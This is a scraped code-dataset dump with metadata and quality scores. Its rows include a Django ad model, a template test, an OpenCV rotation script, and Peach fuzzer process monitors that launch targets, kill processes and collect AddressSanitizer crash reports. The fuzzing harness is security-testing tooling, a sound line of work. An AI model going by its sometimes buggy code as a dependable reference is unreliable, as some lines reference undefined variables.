max_stars_repo_path
stringlengths
4
286
max_stars_repo_name
stringlengths
5
119
max_stars_count
int64
0
191k
id
stringlengths
1
7
content
stringlengths
6
1.03M
content_cleaned
stringlengths
6
1.03M
language
stringclasses
111 values
language_score
float64
0.03
1
comments
stringlengths
0
556k
edu_score
float64
0.32
5.03
edu_int_score
int64
0
5
addle/models.py
makyo/addle
0
6618551
<filename>addle/models.py from django.contrib.auth.models import User from django.db import models class Ad(models.Model): """An advertisement submitted to be displayed on the site""" # The ad's owner owner = models.ForeignKey(User) # The ad's information image = models.ImageField() adult = models.BooleanField(default=False) destination = models.URLField(max_length=4096) class AdLifecycle(models.Model): """A lifecycle for a given ad.""" # The admin scheduling the ad admin_contact = models.ForeignKey(User) # The ad to be shown ad = models.ForeignKey(Ad) # Information about the lifecycle cost = models.DecimalField(max_digits=5, decimal_places=2) paid = models.BooleanField(default=False) live = models.BooleanField(default=False) start_date = models.DateField(null=True, blank=True) end_date = models.DateField(null=True, blank=True) # Information about the ad's activity impressions = models.PositiveIntegerField(default=0) interactions = models.PositiveIntegerField(default=0)
<filename>addle/models.py from django.contrib.auth.models import User from django.db import models class Ad(models.Model): """An advertisement submitted to be displayed on the site""" # The ad's owner owner = models.ForeignKey(User) # The ad's information image = models.ImageField() adult = models.BooleanField(default=False) destination = models.URLField(max_length=4096) class AdLifecycle(models.Model): """A lifecycle for a given ad.""" # The admin scheduling the ad admin_contact = models.ForeignKey(User) # The ad to be shown ad = models.ForeignKey(Ad) # Information about the lifecycle cost = models.DecimalField(max_digits=5, decimal_places=2) paid = models.BooleanField(default=False) live = models.BooleanField(default=False) start_date = models.DateField(null=True, blank=True) end_date = models.DateField(null=True, blank=True) # Information about the ad's activity impressions = models.PositiveIntegerField(default=0) interactions = models.PositiveIntegerField(default=0)
en
0.790676
An advertisement submitted to be displayed on the site # The ad's owner # The ad's information A lifecycle for a given ad. # The admin scheduling the ad # The ad to be shown # Information about the lifecycle # Information about the ad's activity
2.624669
3
tests/loops5.py
mauro-balades/yate
1
6618552
<filename>tests/loops5.py from yate import YateTemplate template = YateTemplate( """ <ul> {% each [1,4125,52312," hello "] as x %} <li>{{ x }}</li> {% end %} </ul> """ ) tmp = template.render(list=[1, 2, 3, 4]) print(tmp)
<filename>tests/loops5.py from yate import YateTemplate template = YateTemplate( """ <ul> {% each [1,4125,52312," hello "] as x %} <li>{{ x }}</li> {% end %} </ul> """ ) tmp = template.render(list=[1, 2, 3, 4]) print(tmp)
en
0.349405
<ul> {% each [1,4125,52312," hello "] as x %} <li>{{ x }}</li> {% end %} </ul>
2.493336
2
Transformations/RotationTranslation.py
sourabmaity/OpenCV_Basics
0
6618553
import cv2 import numpy as np cap = cv2.VideoCapture(0) cap.set(cv2.CAP_PROP_FRAME_WIDTH, 640) cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 480) print(cap.get(cv2.CAP_PROP_FPS)) height, width = 480, 640 center = (width / 2, height / 2) while True: success, img = cap.read() img = cv2.flip(img, 1) # print(img.shape) # Scaling cv2.resize(img,(400,400)) # To get the rotation matrix rotate_matrix = cv2.getRotationMatrix2D(center=center, angle=30, scale=1) # Rotate / Translate the image rotated_image = cv2.warpAffine(src=img, M=rotate_matrix, dsize=(width, height)) #tx, ty = width / 4, height / 4 # create the translation matrix using tx and ty, it is a NumPy array '''translation_matrix = np.array([ [1, 0, tx], [0, 1, ty] ], dtype=np.float32)''' pts1 = np.float32([[50, 50], [200, 50], [50, 200]]) pts2 = np.float32([[10, 100], [200, 50], [100, 250]]) M = cv2.getAffineTransform(pts1, pts2) # Affine Transformation pts1 = np.float32([[56, 65], [368, 52], [28, 387], [389, 390]]) pts2 = np.float32([[0, 0], [300, 0], [0, 300], [300, 300]]) M = cv2.getPerspectiveTransform(pts1, pts2) # Perspective Transformation cv2.imshow("Original", img) cv2.imshow("Rotated image", rotated_image) if cv2.waitKey(5) & 0xFF == 27: break cap.release() cv2.destroyAllWindows()
import cv2 import numpy as np cap = cv2.VideoCapture(0) cap.set(cv2.CAP_PROP_FRAME_WIDTH, 640) cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 480) print(cap.get(cv2.CAP_PROP_FPS)) height, width = 480, 640 center = (width / 2, height / 2) while True: success, img = cap.read() img = cv2.flip(img, 1) # print(img.shape) # Scaling cv2.resize(img,(400,400)) # To get the rotation matrix rotate_matrix = cv2.getRotationMatrix2D(center=center, angle=30, scale=1) # Rotate / Translate the image rotated_image = cv2.warpAffine(src=img, M=rotate_matrix, dsize=(width, height)) #tx, ty = width / 4, height / 4 # create the translation matrix using tx and ty, it is a NumPy array '''translation_matrix = np.array([ [1, 0, tx], [0, 1, ty] ], dtype=np.float32)''' pts1 = np.float32([[50, 50], [200, 50], [50, 200]]) pts2 = np.float32([[10, 100], [200, 50], [100, 250]]) M = cv2.getAffineTransform(pts1, pts2) # Affine Transformation pts1 = np.float32([[56, 65], [368, 52], [28, 387], [389, 390]]) pts2 = np.float32([[0, 0], [300, 0], [0, 300], [300, 300]]) M = cv2.getPerspectiveTransform(pts1, pts2) # Perspective Transformation cv2.imshow("Original", img) cv2.imshow("Rotated image", rotated_image) if cv2.waitKey(5) & 0xFF == 27: break cap.release() cv2.destroyAllWindows()
en
0.420292
# print(img.shape) # Scaling # To get the rotation matrix # Rotate / Translate the image #tx, ty = width / 4, height / 4 # create the translation matrix using tx and ty, it is a NumPy array translation_matrix = np.array([ [1, 0, tx], [0, 1, ty] ], dtype=np.float32) # Affine Transformation # Perspective Transformation
3.010693
3
Templates/Python.py
waba359/VAULT
1
6618554
<filename>Templates/Python.py from sys import stdin input = stdin.readline lmi = lambda: list(map(int, input().split())) mi = lambda: map(int, input().split()) si = lambda: input().strip('\n') ssi = lambda: input().strip('\n').split() //by @astrocat879
<filename>Templates/Python.py from sys import stdin input = stdin.readline lmi = lambda: list(map(int, input().split())) mi = lambda: map(int, input().split()) si = lambda: input().strip('\n') ssi = lambda: input().strip('\n').split() //by @astrocat879
none
1
2.74927
3
submissions/available/Johnson-CausalTesting/Holmes/fuzzers/Peach/Agent/process.py
brittjay0104/rose6icse
0
6618555
<filename>submissions/available/Johnson-CausalTesting/Holmes/fuzzers/Peach/Agent/process.py<gh_stars>0 # This Source Code Form is subject to the terms of the Mozilla Public # License, v. 2.0. If a copy of the MPL was not distributed with this # file, You can obtain one at http://mozilla.org/MPL/2.0/. import os import re import sys import time import json import shlex import signal import threading try: import Queue except ImportError: import queue from subprocess import Popen, STDOUT, PIPE, check_output try: # Todo: Test monitors on Windows and check Python 3 compatibility with PyWin32 import win32con import win32api import win32serviceutil # Todo: Find out which methods are used from this import and do it the right way. from win32process import * except: if sys.platform == 'win32': print("Warning: PyWin32 extensions not found, disabling various process monitors.") from Peach.agent import Monitor, MonitorDebug from Peach.Engine.common import PeachException from Peach.Utilities.common import * class PageHeap(Monitor): """ A monitor that will enable/disable pageheap on an executable. """ def __init__(self, args): try: self._path = os.path.join(args['Path'].replace("'''", ""), "gflags.exe") except: self._path = os.path.join(self.LocateWinDbg(), 'gflags.exe') self._exe = os.path.basename(args['Executable'].replace("'''", "")) self._onParams = ['gflags.exe', '/p', '/full', '/enable', self._exe] self._offParams = ['gflags.exe', '/p', '/disable', self._exe] try: os.spawnv(os.P_WAIT, self._path, self._onParams) except: print("Error, PageHeap failed to launch:") print("\tself._path:", self._path) print("\tself._onParams", self._onParams) raise def LocateWinDbg(self): # NOTE: Update master copy in debugger.py if you change this. try: hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, "Software\\Microsoft\\DebuggingTools") val, _ = win32api.RegQueryValueEx(hkey, "WinDbg") return val except: # Lets try a few common places before failing. 
pgPaths = [ "c:\\", os.environ["SystemDrive"] + "\\", os.environ["ProgramFiles"], ] if "ProgramW6432" in os.environ: pgPaths.append(os.environ["ProgramW6432"]) if "ProgramFiles(x86)" in os.environ: pgPaths.append(os.environ["ProgramFiles(x86)"]) dbgPaths = [ "Debuggers", "Debugger", "Debugging Tools for Windows", "Debugging Tools for Windows (x64)", "Debugging Tools for Windows (x86)", ] for p in pgPaths: for d in dbgPaths: testPath = os.path.join(p, d) if os.path.exists(testPath): return testPath print("Unable to locate gflags.exe!") def OnShutdown(self): os.spawnv(os.P_WAIT, self._path, self._offParams) class WindowsProcess(Monitor): """ Process control agent. This agent is able to start, stop, and monitor if a process is running. If the process exits early a fault will be issued to the fuzzer. """ def __init__(self, args): self.restartOnTest = False if args.has_key('RestartOnEachTest'): if args['RestartOnEachTest'].replace("'''", "").lower() == 'true': self.restartOnTest = True self.faultOnEarlyExit = True if args.has_key('FaultOnEarlyExit'): if args['FaultOnEarlyExit'].replace("'''", "").lower() != 'true': self.faultOnEarlyExit = False self.startOnCall = False if args.has_key('StartOnCall'): self.startOnCall = True self.startOnCallMethod = args['StartOnCall'].replace("'''", "").lower() self.waitForExitOnCall = False if args.has_key('WaitForExitOnCall'): self.waitForExitOnCall = True self.waitForExitOnCallMethod = args['WaitForExitOnCall'].replace("'''", "").lower() if not args.has_key('Command'): raise PeachException("Error, monitor Process requires a parameter named 'Command'") self.strangeExit = False self.command = args["Command"].replace("'''", "") self.args = None self.pid = None self.hProcess = None self.hThread = None self.dwProcessId = None self.dwThreadId = None def PublisherCall(self, method): method = method.lower() if self.startOnCall and self.startOnCallMethod == method: print("Process: startOnCall, starting process!") self._StopProcess() 
self._StartProcess() elif self.waitForExitOnCall and self.waitForExitOnCallMethod == method: print("Process: waitForExitOnCall, waiting on process exit") while True: if not self._IsProcessRunning: print("Process: Process exitted") return time.sleep(0.25) def _StopProcess(self): if self.hProcess is None: return if self._IsProcessRunning(): TerminateProcess(self.hProcess, 0) self.hProcess = None self.hThread = None self.dwProcessId = None self.dwThreadId = None def _StartProcess(self): if self.hProcess is not None: self._StopProcess() hProcess, hThread, dwProcessId, dwThreadId = CreateProcess(None, self.command, None, None, 0, 0, None, None, STARTUPINFO()) self.hProcess = hProcess self.hThread = hThread self.dwProcessId = dwProcessId self.dwThreadId = dwThreadId def _IsProcessRunning(self): if self.hProcess is None: return False ret = GetExitCodeProcess(self.hProcess) if ret != win32con.STILL_ACTIVE: return False ret = GetExitCodeThread(self.hThread) if ret != win32con.STILL_ACTIVE: return False return True def OnTestStarting(self): self.strangeExit = False if not self.startOnCall and (self.restartOnTest or not self._IsProcessRunning()): self._StopProcess() self._StartProcess() elif self.startOnCall: self._StopProcess() def OnTestFinished(self): if not self._IsProcessRunning(): self.strangeExit = True if self.restartOnTest: self._StopProcess() elif self.startOnCall: self._StopProcess() def GetMonitorData(self): if self.strangeExit: return {"WindowsProcess.txt": "Process exited early"} return None def DetectedFault(self): if self.faultOnEarlyExit: return not self._IsProcessRunning() else: return False def OnFault(self): self._StopProcess() def OnShutdown(self): self._StopProcess() class Process(Monitor): """ Process control agent. This agent is able to start, stop, and monitor if a process is running. If the process exits early a fault will be issued to the fuzzer. 
""" def __init__(self, args): self.restartOnTest = False if args.has_key('RestartOnEachTest'): if args['RestartOnEachTest'].replace("'''", "").lower() == 'true': self.restartOnTest = True self.faultOnEarlyExit = True if args.has_key('FaultOnEarlyExit'): if args['FaultOnEarlyExit'].replace("'''", "").lower() != 'true': self.faultOnEarlyExit = False self.startOnCall = False if args.has_key('StartOnCall'): self.startOnCall = True self.startOnCallMethod = args['StartOnCall'].replace("'''", "").lower() self.waitForExitOnCall = False if args.has_key('WaitForExitOnCall'): self.waitForExitOnCall = True self.waitForExitOnCallMethod = args['WaitForExitOnCall'].replace("'''", "").lower() if not args.has_key('Command'): raise PeachException("Error, monitor Process requires a parameter named 'Command'") self.strangeExit = False self.command = args["Command"].replace("'''", "") self.args = self.command.split() self.pid = None self.process = None def PublisherCall(self, method): method = method.lower() if self.startOnCall and self.startOnCallMethod == method: print("Process: startOnCall, starting process!") self._StopProcess() self._StartProcess() elif self.waitForExitOnCall and self.waitForExitOnCallMethod == method: print("Process: waitForExitOnCall, waiting on process exit") while True: if not self._IsProcessRunning(): print("Process: Process exitted") return time.sleep(0.25) def _StopProcess(self): print("Process._StopProcess") if not self.process: return if self._IsProcessRunning(): try: os.kill(self.process.pid, signal.SIGTERM) os.kill(self.process.pid, signal.SIGKILL) except: pass self.process.wait() self.process = None def _StartProcess(self): print("Process._StartProcess") if self.process: self._StopProcess() self.process = Popen(self.args) def _IsProcessRunning(self): if self.process is None: print("Process._IsProcessRunning: False (self.process == None)") return False if self.process.poll() is not None: print("Process._IsProcessRunning: False (self.process.poll != 
None)") return False print("Process._IsProcessRunning: True") return True def OnTestStarting(self): self.strangeExit = False if not self.startOnCall and (self.restartOnTest or not self._IsProcessRunning()): print("Process.OnTestStarting: Stopping and starting process") self._StopProcess() self._StartProcess() elif self.startOnCall: print("Process.OnTestStarting: Stopping process") self._StopProcess() print("Exiting OnTestStarting...") def OnTestFinished(self): if not self._IsProcessRunning(): self.strangeExit = True if self.restartOnTest: print("Process.OnTestFinished: Stopping process") self._StopProcess() elif self.startOnCall: print("Process.OnTestFinished: Stopping process") self._StopProcess() def GetMonitorData(self): if self.strangeExit: return {"Process.txt": "Process exited early"} return None def DetectedFault(self): if self.faultOnEarlyExit: return self.strangeExit else: return False def OnFault(self): self._StopProcess() def OnShutdown(self): self._StopProcess() class WindowsService(Monitor): """ Controls a windows service making sure it's started, optionally restarting, etc. 
""" def __init__(self, args): if args.has_key('RestartOnEachTest'): if args['RestartOnEachTest'].lower() == 'true': self.restartOnTest = True else: self.restartOnTest = False else: self.restartOnTest = False if args.has_key('FaultOnEarlyExit'): if args['FaultOnEarlyExit'].lower() == 'true': self.faultOnEarlyExit = True else: self.faultOnEarlyExit = False else: self.faultOnEarlyExit = True self.strangeExit = False self.service = args["Service"].replace("'''", "") if args.has_key("Machine"): self.machine = args["Machine"].replace("'''", "") else: self.machine = None def _StopProcess(self): win32serviceutil.StopService(self.service, self.machine) while win32serviceutil.QueryServiceStatus(self.service, self.machine)[1] == 3: time.sleep(0.25) if win32serviceutil.QueryServiceStatus(self.service, self.machine)[1] != 1: raise Exception("WindowsService: Unable to stop service!") def _StartProcess(self): if self._IsProcessRunning(): return win32serviceutil.StartService(self.service, self.machine) while win32serviceutil.QueryServiceStatus(self.service, self.machine)[1] == 2: time.sleep(0.25) if win32serviceutil.QueryServiceStatus(self.service, self.machine)[1] == 4: raise Exception("WindowsService: Unable to start service!") def _IsProcessRunning(self): if win32serviceutil.QueryServiceStatus(self.service, self.machine)[1] == 4: return True return False def OnTestStarting(self): self.strangeExit = False if self.restartOnTest or not self._IsProcessRunning(): self._StopProcess() self._StartProcess() def OnTestFinished(self): if not self._IsProcessRunning(): self.strangeExit = True if self.restartOnTest: self._StopProcess() def GetMonitorData(self): if self.strangeExit: return {"WindowsService.txt": "Process exited early"} return None def DetectedFault(self): #if self.faultOnEarlyExit: # return not self._IsProcessRunning() # #else: # return False return False def OnFault(self): self._StopProcess() def OnShutdown(self): pass class ProcessKiller(Monitor): """Will watch for specific 
process and kill.""" def __init__(self, args): self._name = "ProcessWatcher" if not args.has_key("ProcessNames"): raise Exception("ProcessWatcher requires a parameter named ProcessNames.") self._names = args["ProcessNames"].replace("'''", "").split(',') def OnTestStarting(self): pass def OnTestFinished(self): for name in self._names: os.popen('TASKKILL /IM ' + name + ' /F') time.sleep(.6) def DetectedFault(self): return False def OnShutdown(self): try: for name in self._names: os.popen('TASKKILL /IM ' + name + ' /F') time.sleep(.6) except: pass class ProcessID(Monitor): """ Monitors CrashReporter on MacOS, LinuxApport on Linux and the process id of a process. There are external monitors present for CrashReporter and LinuxApport but applying them means having a delay between each testcase because they will wait and observe a folder for a crash report after each test case. This monitor tries to observe the process id for a change and will only after observe a specific folder for a crash report. The monitor does not work with child processes like plugin processes. 
""" def __init__(self, args): Monitor.__init__(self, args) self._name = "ProcessID" self.command = getStringAttribute(args, "Command") if not self.command: raise ValueError("Command not provided or empty in %s" % __file__) self.arguments = shlex.split(self.command) + shlex.split(getStringAttribute(args, "Arguments")) self.process_environment = getStringAttribute(args, "Environment") if self.process_environment: os.environ.update(dict([p.split("=") for p in self.process_environment.split("|")])) self.asan_options = getStringAttribute(args, "ASanOptions") if self.asan_options: os.environ["ASAN_OPTIONS"] = "%s" % self.asan_options self.asan_library_path = getStringAttribute(args, "ASanMacOSRuntime") if isMacOS and self.asan_library_path: os.environ["DYLD_LIBRARY_PATH"] = getStringAttribute(args, "ASanMacOSRuntime") self.asan_symbolizer = getStringAttribute(args, "ASanSymbolizer") if self.asan_symbolizer: os.environ["ASAN_SYMBOLIZER_PATH"] = self.asan_symbolizer self.heartbeat = getFloatAttribute(args, "Heartbeat", "0.0") self.monitor_console = getBooleanAttribute(args, "NoConsoleLogging") self.gdb_cmd_batch = getStringAttribute(args, "GDBCommands") self.print_subprocess_output = getBooleanAttribute(args, "PrintSubprocessOutput") self.lookout_time = getFloatAttribute(args, "LookoutTime", "5.0") self.system_report_path = getStringAttribute(args, 'LogFolder') if self.system_report_path and not os.path.isdir(self.system_report_path): raise ValueError("Provided path for LogFolder is invalid.") elif isMacOS(): self.system_report_path = os.path.join(os.environ['HOME'], "Library/Logs/DiagnosticReports") if os.path.isdir(self.system_report_path): try: os.makedirs(self.system_report_path) except (IOError, OSError) as e: if e.errno != 17: raise self.pid = self.process = None self.console_log = self.crash_trace = [] self.failure = False self.first_run = True def OnTestStarting(self): if not self._IsRunning(): self._StartProcess() def _StartProcess(self): print("Command: 
{}".format(self.arguments)) self.process = Popen(self.arguments, stderr=STDOUT, stdout=PIPE, env=os.environ, bufsize=1, close_fds=isPosix()) self.pid = self.process.pid def enqueue_output(out, queue): for line in iter(out.readline, ""): queue.put(line) out.close() self.terminal_queue = Queue.Queue() self.terminal_producer = threading.Thread(target=enqueue_output, args=(self.process.stdout, self.terminal_queue)) self.terminal_consumer = threading.Thread(target=self._grab_sanitizer_trace) self.terminal_producer.setDaemon(True) self.terminal_consumer.setDaemon(True) self.terminal_producer.start() self.terminal_consumer.start() def _IsRunning(self): if self.process is None: MonitorDebug(self._name, "IsRunning: False (self.process == None") return False if self.process.poll() is not None: MonitorDebug(self._name, "IsRunning: False (self.process.poll != None)") return False MonitorDebug(self._name, "IsRunning: True") return True def _grab_sanitizer_trace(self): """Run in the background and set self.failure to true once an ASan crash got detected.""" inside_sanitizer_trace = False self.crash_trace = [] while True: captured_line = self.terminal_queue.get() if self.print_subprocess_output: print(captured_line.strip("\n")) if self.monitor_console: self.console_log.append(captured_line) if not inside_sanitizer_trace: if captured_line.find("ERROR: AddressSanitizer") != -1 and captured_line.find("AddressSanitizer failed to allocate") == -1: inside_sanitizer_trace = True if inside_sanitizer_trace and \ (captured_line.find("Stats: ") != -1 or captured_line.find("ABORTING") != -1 or captured_line.find("ERROR: Failed") != -1): inside_sanitizer_trace = False self.failure = True break if inside_sanitizer_trace: self.crash_trace.append(captured_line) if self.failure and self._IsRunning(): self.process.terminate() self.process.kill() self.process = None def OnTestFinished(self): self.console_log = [] if not self._IsRunning(): self.failure = True time.sleep(self.heartbeat) def 
_from_core_dump(self, log_folder): core_filename = os.path.join(log_folder, 'core.%s' % str(self.pid)) if os.path.exists(core_filename): gdb_args = ["gdb", "-n", "-batch", "-x", self.gdb_cmd_batch, self.command, core_filename] gdb_output = check_output(gdb_args, stdin=None, stderr=STDOUT, close_fds=isPosix()) os.remove(core_filename) return gdb_output def _from_crash_reporter(self, log_folder): report = "" for fname in os.listdir(log_folder): if not fname.endswith(".crash"): continue with open(os.path.join(log_folder, fname)) as fd: content = fd.readlines() try: crash_pid = int(re.findall("\[(\d+)\]", content[0])[0]) except: continue if crash_pid == self.pid: report = "".join(content) os.remove(os.path.join(log_folder, fname)) break return report def get_crash_report(self, log_folder): if not os.path.isdir(log_folder): return "" if isMacOS(): return self._from_crash_reporter(log_folder) if isLinux(): return self._from_core_dump(log_folder) def DetectedFault(self): return self.failure def GetMonitorData(self): time.sleep(self.lookout_time) sytem_crash_report = self.get_crash_report(self.system_report_path) bucket = {} if not len(self.crash_trace): if self.process.returncode < 0: crashSignals = [ # POSIX.1-1990 signals signal.SIGILL, signal.SIGABRT, signal.SIGFPE, signal.SIGSEGV, # SUSv2 / POSIX.1-2001 signals signal.SIGBUS, signal.SIGSYS, signal.SIGTRAP, ] for crashSignal in crashSignals: if process.returncode == -crashSignal: bucket["auxdat.txt"] = "Process exited with signal: %d" % -process.returncode else: bucket["auxdat.txt"] = "".join(self.crash_trace) if sytem_crash_report: bucket["system_crash_report.txt"] = sytem_crash_report if self.console_log: bucket["stdout.txt"] = "".join(self.console_log[-1000:]) if self.failure: meta = { "environ": os.environ.data, "command": self.arguments } bucket["meta.txt"] = json.dumps(dict(meta)) bucket["Bucket"] = os.path.basename(self.command) return bucket def OnFault(self): self._StopProcess() def OnShutdown(self): 
self._StopProcess() def _StopProcess(self): self.failure = False if self._IsRunning(): try: MonitorDebug(self._name, "calling terminate()") self.process.terminate() MonitorDebug(self._name, "calling kill()") self.process.kill() except Exception: print(sys.exc_info()) self.process.wait() self.process = None class ASanConsoleMonitor(Monitor): def __init__(self, args): Monitor.__init__(self, args) self._name = "ASanConsoleMonitor" self.command = getStringAttribute(args, "Command") if not self.command: raise ValueError("Command not provided or empty in %s" % __file__) self.arguments = shlex.split(self.command) + shlex.split(getStringAttribute(args, "Arguments")) self.process_environment = getStringAttribute(args, "Environment") if self.process_environment: os.environ.update(dict([p.split("=") for p in self.process_environment.split("|")])) self.asan_options = getStringAttribute(args, "ASanOptions") if self.asan_options: os.environ["ASAN_OPTIONS"] = "%s" % self.asan_options self.asan_library_path = getStringAttribute(args, "ASanMacOSRuntime") if isMacOS and self.asan_library_path: os.environ["DYLD_LIBRARY_PATH"] = getStringAttribute(args, "ASanMacOSRuntime") self.asan_symbolizer = getStringAttribute(args, "ASanSymbolizer") if self.asan_symbolizer: os.environ["ASAN_SYMBOLIZER_PATH"] = self.asan_symbolizer if "StartOnCall" in args: self.start_on_call = True self.OnCallMethod = getStringAttribute(args, 'StartOnCall') else: self.start_on_call = False self.asan_regex = "(ERROR: AddressSanitizer:.*[Stats:|ABORTING|ERROR: Failed])" self.stderr = [] self.stdout = [] self.sanlog = [] self.process = None self.failure = False def OnTestStarting(self): if not self.start_on_call and not self._IsRunning(): self._StopProcess() self._StartProcess() elif self.start_on_call: self._StopProcess() def PublisherCall(self, method): if self.start_on_call and self.OnCallMethod == method: MonitorDebug(self._name, "PublisherCall") self._StopProcess() self._StartProcess() def _IsRunning(self): if 
self.process is None: MonitorDebug(self._name, "IsRunning: False (self.process == None") return False if self.process.poll() is not None: MonitorDebug(self._name, "IsRunning: False (self.process.poll != None)") return False MonitorDebug(self._name, "IsRunning: True") return True def _StartProcess(self): MonitorDebug(self._name, "_StartProcess") self.failure = False self.sanlog = [] self.stderr = [] self.stdout = [] print("Command: {}".format(self.arguments)) self.process = Popen(self.arguments, stderr=PIPE, stdout=PIPE, env=os.environ, bufsize=1, close_fds=isPosix()) # Todo: Add timeout= for GUI applications. stdout, stderr = self.process.communicate() if stderr.find("ERROR: AddressSanitizer: ") != -1: if stderr.find("AddressSanitizer failed to allocate") == -1: self.failure = True self.sanlog = re.findall(self.asan_regex, stderr, re.DOTALL)[0] self.stdout = stdout self.stderr = stderr else: if self.process.returncode < 0: crashSignals = [ # POSIX.1-1990 signals signal.SIGILL, signal.SIGABRT, signal.SIGFPE, signal.SIGSEGV, # SUSv2 / POSIX.1-2001 signals signal.SIGBUS, signal.SIGSYS, signal.SIGTRAP, ] for crashSignal in crashSignals: if process.returncode == -crashSignal: self.failure = True self.sanlog = "Process exited with signal: %d" % -process.returncode self.stdout = stdout self.stderr = stderr if self.failure: self._StopProcess() def OnTestFinished(self): if self._IsRunning(): self._StopProcess() def DetectedFault(self): return self.failure def GetMonitorData(self): #if not self.failure: # return bucket = {} if self.sanlog: bucket["auxdat.txt"] = "".join(self.sanlog) if self.stdout: bucket["stdout.txt"] = "".join(self.stdout) if self.stderr: bucket["stderr.txt"] = "".join(self.stderr) meta = { "environ": os.environ.data, "command": self.arguments, "returncode": self.process.returncode } bucket["meta.txt"] = json.dumps(dict(meta)) bucket["Bucket"] = os.path.basename(self.command) return bucket def OnFault(self): self._StopProcess() def OnShutdown(self): 
self._StopProcess() def _StopProcess(self): if not self.process: return if self._IsRunning(): try: MonitorDebug(self._name, "calling terminate()") self.process.terminate() MonitorDebug(self._name, "calling kill()") self.process.kill() except Exception: print(sys.exc_info()) self.process.wait() self.process = None
<filename>submissions/available/Johnson-CausalTesting/Holmes/fuzzers/Peach/Agent/process.py<gh_stars>0 # This Source Code Form is subject to the terms of the Mozilla Public # License, v. 2.0. If a copy of the MPL was not distributed with this # file, You can obtain one at http://mozilla.org/MPL/2.0/. import os import re import sys import time import json import shlex import signal import threading try: import Queue except ImportError: import queue from subprocess import Popen, STDOUT, PIPE, check_output try: # Todo: Test monitors on Windows and check Python 3 compatibility with PyWin32 import win32con import win32api import win32serviceutil # Todo: Find out which methods are used from this import and do it the right way. from win32process import * except: if sys.platform == 'win32': print("Warning: PyWin32 extensions not found, disabling various process monitors.") from Peach.agent import Monitor, MonitorDebug from Peach.Engine.common import PeachException from Peach.Utilities.common import * class PageHeap(Monitor): """ A monitor that will enable/disable pageheap on an executable. """ def __init__(self, args): try: self._path = os.path.join(args['Path'].replace("'''", ""), "gflags.exe") except: self._path = os.path.join(self.LocateWinDbg(), 'gflags.exe') self._exe = os.path.basename(args['Executable'].replace("'''", "")) self._onParams = ['gflags.exe', '/p', '/full', '/enable', self._exe] self._offParams = ['gflags.exe', '/p', '/disable', self._exe] try: os.spawnv(os.P_WAIT, self._path, self._onParams) except: print("Error, PageHeap failed to launch:") print("\tself._path:", self._path) print("\tself._onParams", self._onParams) raise def LocateWinDbg(self): # NOTE: Update master copy in debugger.py if you change this. try: hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, "Software\\Microsoft\\DebuggingTools") val, _ = win32api.RegQueryValueEx(hkey, "WinDbg") return val except: # Lets try a few common places before failing. 
pgPaths = [ "c:\\", os.environ["SystemDrive"] + "\\", os.environ["ProgramFiles"], ] if "ProgramW6432" in os.environ: pgPaths.append(os.environ["ProgramW6432"]) if "ProgramFiles(x86)" in os.environ: pgPaths.append(os.environ["ProgramFiles(x86)"]) dbgPaths = [ "Debuggers", "Debugger", "Debugging Tools for Windows", "Debugging Tools for Windows (x64)", "Debugging Tools for Windows (x86)", ] for p in pgPaths: for d in dbgPaths: testPath = os.path.join(p, d) if os.path.exists(testPath): return testPath print("Unable to locate gflags.exe!") def OnShutdown(self): os.spawnv(os.P_WAIT, self._path, self._offParams) class WindowsProcess(Monitor): """ Process control agent. This agent is able to start, stop, and monitor if a process is running. If the process exits early a fault will be issued to the fuzzer. """ def __init__(self, args): self.restartOnTest = False if args.has_key('RestartOnEachTest'): if args['RestartOnEachTest'].replace("'''", "").lower() == 'true': self.restartOnTest = True self.faultOnEarlyExit = True if args.has_key('FaultOnEarlyExit'): if args['FaultOnEarlyExit'].replace("'''", "").lower() != 'true': self.faultOnEarlyExit = False self.startOnCall = False if args.has_key('StartOnCall'): self.startOnCall = True self.startOnCallMethod = args['StartOnCall'].replace("'''", "").lower() self.waitForExitOnCall = False if args.has_key('WaitForExitOnCall'): self.waitForExitOnCall = True self.waitForExitOnCallMethod = args['WaitForExitOnCall'].replace("'''", "").lower() if not args.has_key('Command'): raise PeachException("Error, monitor Process requires a parameter named 'Command'") self.strangeExit = False self.command = args["Command"].replace("'''", "") self.args = None self.pid = None self.hProcess = None self.hThread = None self.dwProcessId = None self.dwThreadId = None def PublisherCall(self, method): method = method.lower() if self.startOnCall and self.startOnCallMethod == method: print("Process: startOnCall, starting process!") self._StopProcess() 
self._StartProcess() elif self.waitForExitOnCall and self.waitForExitOnCallMethod == method: print("Process: waitForExitOnCall, waiting on process exit") while True: if not self._IsProcessRunning: print("Process: Process exitted") return time.sleep(0.25) def _StopProcess(self): if self.hProcess is None: return if self._IsProcessRunning(): TerminateProcess(self.hProcess, 0) self.hProcess = None self.hThread = None self.dwProcessId = None self.dwThreadId = None def _StartProcess(self): if self.hProcess is not None: self._StopProcess() hProcess, hThread, dwProcessId, dwThreadId = CreateProcess(None, self.command, None, None, 0, 0, None, None, STARTUPINFO()) self.hProcess = hProcess self.hThread = hThread self.dwProcessId = dwProcessId self.dwThreadId = dwThreadId def _IsProcessRunning(self): if self.hProcess is None: return False ret = GetExitCodeProcess(self.hProcess) if ret != win32con.STILL_ACTIVE: return False ret = GetExitCodeThread(self.hThread) if ret != win32con.STILL_ACTIVE: return False return True def OnTestStarting(self): self.strangeExit = False if not self.startOnCall and (self.restartOnTest or not self._IsProcessRunning()): self._StopProcess() self._StartProcess() elif self.startOnCall: self._StopProcess() def OnTestFinished(self): if not self._IsProcessRunning(): self.strangeExit = True if self.restartOnTest: self._StopProcess() elif self.startOnCall: self._StopProcess() def GetMonitorData(self): if self.strangeExit: return {"WindowsProcess.txt": "Process exited early"} return None def DetectedFault(self): if self.faultOnEarlyExit: return not self._IsProcessRunning() else: return False def OnFault(self): self._StopProcess() def OnShutdown(self): self._StopProcess() class Process(Monitor): """ Process control agent. This agent is able to start, stop, and monitor if a process is running. If the process exits early a fault will be issued to the fuzzer. 
